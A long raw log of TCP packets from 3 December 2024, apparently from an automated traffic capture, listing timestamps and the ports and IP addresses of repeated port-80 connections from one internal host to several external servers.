                                                                                                                                                                                                                                Dec 3, 2024 14:54:55.013077021 CET804981245.197.47.177192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:54:55.013093948 CET4981280192.168.11.2045.197.47.177
                                                                                                                                                                                                                                Dec 3, 2024 14:54:55.013113976 CET804981245.197.47.177192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:54:55.013149023 CET804981245.197.47.177192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:54:55.013184071 CET804981245.197.47.177192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:54:55.013216972 CET804981245.197.47.177192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:54:55.013251066 CET804981245.197.47.177192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:54:55.013267994 CET4981280192.168.11.2045.197.47.177
                                                                                                                                                                                                                                Dec 3, 2024 14:54:55.013286114 CET804981245.197.47.177192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:54:55.013319969 CET804981245.197.47.177192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:54:55.013354063 CET804981245.197.47.177192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:54:55.013387918 CET804981245.197.47.177192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:54:55.013400078 CET4981280192.168.11.2045.197.47.177
                                                                                                                                                                                                                                Dec 3, 2024 14:54:55.013459921 CET4981280192.168.11.2045.197.47.177
                                                                                                                                                                                                                                Dec 3, 2024 14:54:55.013465881 CET804981245.197.47.177192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:54:55.013520956 CET804981245.197.47.177192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:54:55.013555050 CET804981245.197.47.177192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:54:55.013587952 CET804981245.197.47.177192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:54:55.013603926 CET4981280192.168.11.2045.197.47.177
                                                                                                                                                                                                                                Dec 3, 2024 14:54:55.013624907 CET804981245.197.47.177192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:54:55.013720036 CET4981280192.168.11.2045.197.47.177
                                                                                                                                                                                                                                Dec 3, 2024 14:54:55.013809919 CET4981280192.168.11.2045.197.47.177
                                                                                                                                                                                                                                Dec 3, 2024 14:54:55.905687094 CET4981280192.168.11.2045.197.47.177
                                                                                                                                                                                                                                Dec 3, 2024 14:54:56.921732903 CET4981380192.168.11.2045.197.47.177
                                                                                                                                                                                                                                Dec 3, 2024 14:54:57.236377001 CET804981345.197.47.177192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:54:57.236582994 CET4981380192.168.11.2045.197.47.177
                                                                                                                                                                                                                                Dec 3, 2024 14:54:57.240030050 CET4981380192.168.11.2045.197.47.177
                                                                                                                                                                                                                                Dec 3, 2024 14:54:57.554600000 CET804981345.197.47.177192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:54:57.556756973 CET804981345.197.47.177192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:54:57.556817055 CET804981345.197.47.177192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:54:57.556864023 CET804981345.197.47.177192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:54:57.557074070 CET804981345.197.47.177192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:54:57.557087898 CET4981380192.168.11.2045.197.47.177
                                                                                                                                                                                                                                Dec 3, 2024 14:54:57.557132959 CET804981345.197.47.177192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:54:57.557178974 CET804981345.197.47.177192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:54:57.557219982 CET804981345.197.47.177192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:54:57.557265997 CET804981345.197.47.177192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:54:57.557265043 CET4981380192.168.11.2045.197.47.177
                                                                                                                                                                                                                                Dec 3, 2024 14:54:57.557308912 CET804981345.197.47.177192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:54:57.557357073 CET804981345.197.47.177192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:54:57.557373047 CET4981380192.168.11.2045.197.47.177
                                                                                                                                                                                                                                Dec 3, 2024 14:54:57.557442904 CET4981380192.168.11.2045.197.47.177
                                                                                                                                                                                                                                Dec 3, 2024 14:54:57.557594061 CET4981380192.168.11.2045.197.47.177
                                                                                                                                                                                                                                Dec 3, 2024 14:54:57.871862888 CET804981345.197.47.177192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:54:57.871922970 CET804981345.197.47.177192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:54:57.871968985 CET804981345.197.47.177192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:54:57.872181892 CET4981380192.168.11.2045.197.47.177
                                                                                                                                                                                                                                Dec 3, 2024 14:54:58.748754978 CET4981380192.168.11.2045.197.47.177
                                                                                                                                                                                                                                Dec 3, 2024 14:54:59.764904976 CET4981480192.168.11.2045.197.47.177
                                                                                                                                                                                                                                Dec 3, 2024 14:55:00.077215910 CET804981445.197.47.177192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:55:00.077395916 CET4981480192.168.11.2045.197.47.177
                                                                                                                                                                                                                                Dec 3, 2024 14:55:00.080641031 CET4981480192.168.11.2045.197.47.177
                                                                                                                                                                                                                                Dec 3, 2024 14:55:00.080698967 CET4981480192.168.11.2045.197.47.177
                                                                                                                                                                                                                                Dec 3, 2024 14:55:00.080746889 CET4981480192.168.11.2045.197.47.177
                                                                                                                                                                                                                                Dec 3, 2024 14:55:00.392867088 CET804981445.197.47.177192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:55:00.393120050 CET804981445.197.47.177192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:55:00.393347979 CET804981445.197.47.177192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:55:00.395240068 CET804981445.197.47.177192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:55:00.395479918 CET804981445.197.47.177192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:55:00.395488977 CET804981445.197.47.177192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:55:00.395495892 CET804981445.197.47.177192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:55:00.395515919 CET804981445.197.47.177192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:55:00.395522118 CET804981445.197.47.177192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:55:00.395529032 CET804981445.197.47.177192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:55:00.395534992 CET804981445.197.47.177192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:55:00.395539999 CET804981445.197.47.177192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:55:00.395545959 CET804981445.197.47.177192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:55:00.395570040 CET4981480192.168.11.2045.197.47.177
                                                                                                                                                                                                                                Dec 3, 2024 14:55:00.395570040 CET4981480192.168.11.2045.197.47.177
                                                                                                                                                                                                                                Dec 3, 2024 14:55:00.395736933 CET4981480192.168.11.2045.197.47.177
                                                                                                                                                                                                                                Dec 3, 2024 14:55:00.707953930 CET804981445.197.47.177192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:55:00.708003998 CET804981445.197.47.177192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:55:00.708039045 CET804981445.197.47.177192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:55:00.708071947 CET804981445.197.47.177192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:55:00.708106041 CET804981445.197.47.177192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:55:00.708142996 CET804981445.197.47.177192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:55:00.708175898 CET804981445.197.47.177192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:55:00.708210945 CET804981445.197.47.177192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:55:00.708244085 CET804981445.197.47.177192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:55:00.708277941 CET804981445.197.47.177192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:55:00.708276033 CET4981480192.168.11.2045.197.47.177
                                                                                                                                                                                                                                Dec 3, 2024 14:55:00.708311081 CET804981445.197.47.177192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:55:00.708322048 CET4981480192.168.11.2045.197.47.177
                                                                                                                                                                                                                                Dec 3, 2024 14:55:00.708347082 CET804981445.197.47.177192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:55:00.708380938 CET804981445.197.47.177192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:55:00.708415985 CET804981445.197.47.177192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:55:00.708446026 CET4981480192.168.11.2045.197.47.177
                                                                                                                                                                                                                                Dec 3, 2024 14:55:00.708448887 CET804981445.197.47.177192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:55:00.708483934 CET804981445.197.47.177192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:55:00.708518028 CET804981445.197.47.177192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:55:00.708551884 CET804981445.197.47.177192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:55:00.708551884 CET4981480192.168.11.2045.197.47.177
                                                                                                                                                                                                                                Dec 3, 2024 14:55:00.708585024 CET4981480192.168.11.2045.197.47.177
                                                                                                                                                                                                                                Dec 3, 2024 14:55:00.708586931 CET804981445.197.47.177192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:55:00.708621025 CET804981445.197.47.177192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:55:00.708657026 CET804981445.197.47.177192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:55:00.708709002 CET4981480192.168.11.2045.197.47.177
                                                                                                                                                                                                                                Dec 3, 2024 14:55:00.708741903 CET4981480192.168.11.2045.197.47.177
                                                                                                                                                                                                                                Dec 3, 2024 14:55:00.708880901 CET4981480192.168.11.2045.197.47.177
                                                                                                                                                                                                                                Dec 3, 2024 14:55:01.591938972 CET4981480192.168.11.2045.197.47.177
                                                                                                                                                                                                                                Dec 3, 2024 14:55:02.607949018 CET4981580192.168.11.2045.197.47.177
                                                                                                                                                                                                                                Dec 3, 2024 14:55:02.923280001 CET804981545.197.47.177192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:55:02.923485994 CET4981580192.168.11.2045.197.47.177
                                                                                                                                                                                                                                Dec 3, 2024 14:55:02.925647974 CET4981580192.168.11.2045.197.47.177
                                                                                                                                                                                                                                Dec 3, 2024 14:55:03.240819931 CET804981545.197.47.177192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:55:03.241132975 CET804981545.197.47.177192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:55:03.241188049 CET804981545.197.47.177192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:55:03.241234064 CET804981545.197.47.177192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:55:03.241367102 CET804981545.197.47.177192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:55:03.241431952 CET804981545.197.47.177192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:55:03.241492987 CET4981580192.168.11.2045.197.47.177
                                                                                                                                                                                                                                Dec 3, 2024 14:55:03.241508007 CET804981545.197.47.177192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:55:03.241548061 CET4981580192.168.11.2045.197.47.177
                                                                                                                                                                                                                                Dec 3, 2024 14:55:03.241553068 CET804981545.197.47.177192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:55:03.241599083 CET804981545.197.47.177192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:55:03.241642952 CET804981545.197.47.177192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:55:03.241667986 CET4981580192.168.11.2045.197.47.177
                                                                                                                                                                                                                                Dec 3, 2024 14:55:03.241686106 CET804981545.197.47.177192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:55:03.241801977 CET4981580192.168.11.2045.197.47.177
                                                                                                                                                                                                                                Dec 3, 2024 14:55:03.241863966 CET4981580192.168.11.2045.197.47.177
                                                                                                                                                                                                                                Dec 3, 2024 14:55:03.557071924 CET804981545.197.47.177192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:55:03.557118893 CET804981545.197.47.177192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:55:03.557157040 CET804981545.197.47.177192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:55:03.557342052 CET4981580192.168.11.2045.197.47.177
                                                                                                                                                                                                                                Dec 3, 2024 14:55:03.557446003 CET804981545.197.47.177192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:55:03.557518005 CET804981545.197.47.177192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:55:03.557555914 CET804981545.197.47.177192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:55:03.557591915 CET804981545.197.47.177192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:55:03.557627916 CET804981545.197.47.177192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:55:03.557663918 CET804981545.197.47.177192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:55:03.557701111 CET804981545.197.47.177192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:55:03.557734966 CET804981545.197.47.177192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:55:03.557775021 CET804981545.197.47.177192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:55:03.557784081 CET4981580192.168.11.2045.197.47.177
                                                                                                                                                                                                                                Dec 3, 2024 14:55:03.557811975 CET804981545.197.47.177192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:55:03.557848930 CET804981545.197.47.177192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:55:03.557883978 CET804981545.197.47.177192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:55:03.557919025 CET804981545.197.47.177192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:55:03.557954073 CET804981545.197.47.177192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:55:03.557971954 CET4981580192.168.11.2045.197.47.177
                                                                                                                                                                                                                                Dec 3, 2024 14:55:03.557990074 CET804981545.197.47.177192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:55:03.558026075 CET804981545.197.47.177192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:55:03.558062077 CET804981545.197.47.177192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:55:03.558115005 CET4981580192.168.11.2045.197.47.177
                                                                                                                                                                                                                                Dec 3, 2024 14:55:03.558152914 CET4981580192.168.11.2045.197.47.177
                                                                                                                                                                                                                                Dec 3, 2024 14:55:03.558312893 CET4981580192.168.11.2045.197.47.177
                                                                                                                                                                                                                                Dec 3, 2024 14:55:03.873239040 CET804981545.197.47.177192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:55:03.873274088 CET804981545.197.47.177192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:55:03.873300076 CET804981545.197.47.177192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:55:03.873325109 CET804981545.197.47.177192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:55:03.873349905 CET804981545.197.47.177192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:55:03.873377085 CET804981545.197.47.177192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:55:03.873440981 CET4981580192.168.11.2045.197.47.177
                                                                                                                                                                                                                                Dec 3, 2024 14:55:03.873545885 CET4981580192.168.11.2045.197.47.177
                                                                                                                                                                                                                                Dec 3, 2024 14:55:03.873572111 CET804981545.197.47.177192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:55:03.873608112 CET804981545.197.47.177192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:55:03.873635054 CET804981545.197.47.177192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:55:03.873660088 CET804981545.197.47.177192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:55:03.873684883 CET804981545.197.47.177192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:55:03.873711109 CET804981545.197.47.177192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:55:03.873737097 CET804981545.197.47.177192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:55:03.873763084 CET804981545.197.47.177192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:55:03.873788118 CET804981545.197.47.177192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:55:03.873805046 CET4981580192.168.11.2045.197.47.177
                                                                                                                                                                                                                                Dec 3, 2024 14:55:03.873816013 CET804981545.197.47.177192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:55:03.873842955 CET804981545.197.47.177192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:55:03.873886108 CET4981580192.168.11.2045.197.47.177
                                                                                                                                                                                                                                Dec 3, 2024 14:55:03.873923063 CET4981580192.168.11.2045.197.47.177
                                                                                                                                                                                                                                Dec 3, 2024 14:55:03.873933077 CET804981545.197.47.177192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:55:03.873939037 CET804981545.197.47.177192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:55:03.873939991 CET804981545.197.47.177192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:55:03.873941898 CET804981545.197.47.177192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:55:03.873964071 CET804981545.197.47.177192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:55:03.873991013 CET804981545.197.47.177192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:55:03.874017000 CET804981545.197.47.177192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:55:03.874042034 CET804981545.197.47.177192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:55:03.874044895 CET4981580192.168.11.2045.197.47.177
                                                                                                                                                                                                                                Dec 3, 2024 14:55:03.874068022 CET804981545.197.47.177192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:55:03.874094963 CET804981545.197.47.177192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:55:03.874114990 CET804981545.197.47.177192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:55:03.874213934 CET4981580192.168.11.2045.197.47.177
                                                                                                                                                                                                                                Dec 3, 2024 14:55:03.874387026 CET4981580192.168.11.2045.197.47.177
                                                                                                                                                                                                                                Dec 3, 2024 14:55:03.875175953 CET4981580192.168.11.2045.197.47.177
                                                                                                                                                                                                                                Dec 3, 2024 14:55:04.190323114 CET804981545.197.47.177192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:55:11.944395065 CET4981680192.168.11.20172.96.191.39
                                                                                                                                                                                                                                Dec 3, 2024 14:55:12.288347960 CET8049816172.96.191.39192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:55:12.288542986 CET4981680192.168.11.20172.96.191.39
                                                                                                                                                                                                                                Dec 3, 2024 14:55:12.290703058 CET4981680192.168.11.20172.96.191.39
                                                                                                                                                                                                                                Dec 3, 2024 14:55:12.634265900 CET8049816172.96.191.39192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:55:12.634779930 CET8049816172.96.191.39192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:55:12.634789944 CET8049816172.96.191.39192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:55:12.635344982 CET4981680192.168.11.20172.96.191.39
                                                                                                                                                                                                                                Dec 3, 2024 14:55:12.635998964 CET4981680192.168.11.20172.96.191.39
                                                                                                                                                                                                                                Dec 3, 2024 14:55:12.979485035 CET8049816172.96.191.39192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:55:17.653152943 CET4981780192.168.11.20217.160.0.183
                                                                                                                                                                                                                                Dec 3, 2024 14:55:17.839756012 CET8049817217.160.0.183192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:55:17.839940071 CET4981780192.168.11.20217.160.0.183
                                                                                                                                                                                                                                Dec 3, 2024 14:55:17.843333006 CET4981780192.168.11.20217.160.0.183
                                                                                                                                                                                                                                Dec 3, 2024 14:55:18.029928923 CET8049817217.160.0.183192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:55:18.049494982 CET8049817217.160.0.183192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:55:18.049544096 CET8049817217.160.0.183192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:55:18.049772978 CET4981780192.168.11.20217.160.0.183
                                                                                                                                                                                                                                Dec 3, 2024 14:55:19.353732109 CET4981780192.168.11.20217.160.0.183
                                                                                                                                                                                                                                Dec 3, 2024 14:55:20.369713068 CET4981880192.168.11.20217.160.0.183
                                                                                                                                                                                                                                Dec 3, 2024 14:55:20.556351900 CET8049818217.160.0.183192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:55:20.556557894 CET4981880192.168.11.20217.160.0.183
                                                                                                                                                                                                                                Dec 3, 2024 14:55:20.559739113 CET4981880192.168.11.20217.160.0.183
                                                                                                                                                                                                                                Dec 3, 2024 14:55:20.746377945 CET8049818217.160.0.183192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:55:20.759258032 CET8049818217.160.0.183192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:55:20.759303093 CET8049818217.160.0.183192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:55:20.759489059 CET4981880192.168.11.20217.160.0.183
                                                                                                                                                                                                                                Dec 3, 2024 14:55:22.071832895 CET4981880192.168.11.20217.160.0.183
                                                                                                                                                                                                                                Dec 3, 2024 14:55:23.087857962 CET4981980192.168.11.20217.160.0.183
                                                                                                                                                                                                                                Dec 3, 2024 14:55:23.274627924 CET8049819217.160.0.183192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:55:23.274785042 CET4981980192.168.11.20217.160.0.183
                                                                                                                                                                                                                                Dec 3, 2024 14:55:23.278038025 CET4981980192.168.11.20217.160.0.183
                                                                                                                                                                                                                                Dec 3, 2024 14:55:23.278063059 CET4981980192.168.11.20217.160.0.183
                                                                                                                                                                                                                                Dec 3, 2024 14:55:23.278135061 CET4981980192.168.11.20217.160.0.183
                                                                                                                                                                                                                                Dec 3, 2024 14:55:23.464824915 CET8049819217.160.0.183192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:55:23.464834929 CET8049819217.160.0.183192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:55:23.464842081 CET8049819217.160.0.183192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:55:23.465065956 CET8049819217.160.0.183192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:55:23.465075016 CET8049819217.160.0.183192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:55:23.465081930 CET8049819217.160.0.183192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:55:23.465374947 CET8049819217.160.0.183192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:55:23.500036001 CET8049819217.160.0.183192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:55:23.500046015 CET8049819217.160.0.183192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:55:23.500207901 CET4981980192.168.11.20217.160.0.183
                                                                                                                                                                                                                                Dec 3, 2024 14:55:24.789880037 CET4981980192.168.11.20217.160.0.183
                                                                                                                                                                                                                                Dec 3, 2024 14:55:25.805978060 CET4982080192.168.11.20217.160.0.183
                                                                                                                                                                                                                                Dec 3, 2024 14:55:25.992804050 CET8049820217.160.0.183192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:55:25.993011951 CET4982080192.168.11.20217.160.0.183
                                                                                                                                                                                                                                Dec 3, 2024 14:55:25.995148897 CET4982080192.168.11.20217.160.0.183
                                                                                                                                                                                                                                Dec 3, 2024 14:55:26.181853056 CET8049820217.160.0.183192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:55:26.190704107 CET8049820217.160.0.183192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:55:26.190979004 CET8049820217.160.0.183192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:55:26.191248894 CET4982080192.168.11.20217.160.0.183
                                                                                                                                                                                                                                Dec 3, 2024 14:55:26.191797972 CET4982080192.168.11.20217.160.0.183
                                                                                                                                                                                                                                Dec 3, 2024 14:55:26.378293991 CET8049820217.160.0.183192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:55:31.195446014 CET4982180192.168.11.2084.32.84.32
                                                                                                                                                                                                                                Dec 3, 2024 14:55:31.407022953 CET804982184.32.84.32192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:55:31.407196045 CET4982180192.168.11.2084.32.84.32
                                                                                                                                                                                                                                Dec 3, 2024 14:55:31.410336018 CET4982180192.168.11.2084.32.84.32
                                                                                                                                                                                                                                Dec 3, 2024 14:55:31.622061014 CET804982184.32.84.32192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:55:31.622095108 CET804982184.32.84.32192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:55:33.929265976 CET4982280192.168.11.2084.32.84.32
                                                                                                                                                                                                                                Dec 3, 2024 14:55:34.141064882 CET804982284.32.84.32192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:55:34.141246080 CET4982280192.168.11.2084.32.84.32
                                                                                                                                                                                                                                Dec 3, 2024 14:55:34.144407988 CET4982280192.168.11.2084.32.84.32
                                                                                                                                                                                                                                Dec 3, 2024 14:55:34.356127024 CET804982284.32.84.32192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:55:34.356601954 CET804982284.32.84.32192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:55:36.662977934 CET4982380192.168.11.2084.32.84.32
                                                                                                                                                                                                                                Dec 3, 2024 14:55:36.874931097 CET804982384.32.84.32192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:55:36.875118017 CET4982380192.168.11.2084.32.84.32
                                                                                                                                                                                                                                Dec 3, 2024 14:55:36.878411055 CET4982380192.168.11.2084.32.84.32
                                                                                                                                                                                                                                Dec 3, 2024 14:55:36.878499985 CET4982380192.168.11.2084.32.84.32
                                                                                                                                                                                                                                Dec 3, 2024 14:55:37.091747046 CET804982384.32.84.32192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:55:37.091793060 CET804982384.32.84.32192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:55:37.091821909 CET804982384.32.84.32192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:55:39.396708012 CET4982480192.168.11.2084.32.84.32
                                                                                                                                                                                                                                Dec 3, 2024 14:55:39.608505011 CET804982484.32.84.32192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:55:39.608696938 CET4982480192.168.11.2084.32.84.32
                                                                                                                                                                                                                                Dec 3, 2024 14:55:39.610806942 CET4982480192.168.11.2084.32.84.32
                                                                                                                                                                                                                                Dec 3, 2024 14:55:39.822561026 CET804982484.32.84.32192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:55:39.822619915 CET804982484.32.84.32192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:55:39.822767019 CET804982484.32.84.32192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:55:39.823002100 CET4982480192.168.11.2084.32.84.32
                                                                                                                                                                                                                                Dec 3, 2024 14:55:39.823132038 CET804982484.32.84.32192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:55:39.823187113 CET804982484.32.84.32192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:55:39.823283911 CET804982484.32.84.32192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:55:39.823329926 CET804982484.32.84.32192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:55:39.823370934 CET804982484.32.84.32192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:55:39.823402882 CET4982480192.168.11.2084.32.84.32
                                                                                                                                                                                                                                Dec 3, 2024 14:55:39.823415041 CET804982484.32.84.32192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:55:39.823448896 CET4982480192.168.11.2084.32.84.32
                                                                                                                                                                                                                                Dec 3, 2024 14:55:39.823709965 CET4982480192.168.11.2084.32.84.32
                                                                                                                                                                                                                                Dec 3, 2024 14:55:39.824234962 CET4982480192.168.11.2084.32.84.32
                                                                                                                                                                                                                                Dec 3, 2024 14:55:40.035593033 CET804982484.32.84.32192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:55:44.833106041 CET4982580192.168.11.20209.74.79.42
                                                                                                                                                                                                                                Dec 3, 2024 14:55:45.000514030 CET8049825209.74.79.42192.168.11.20
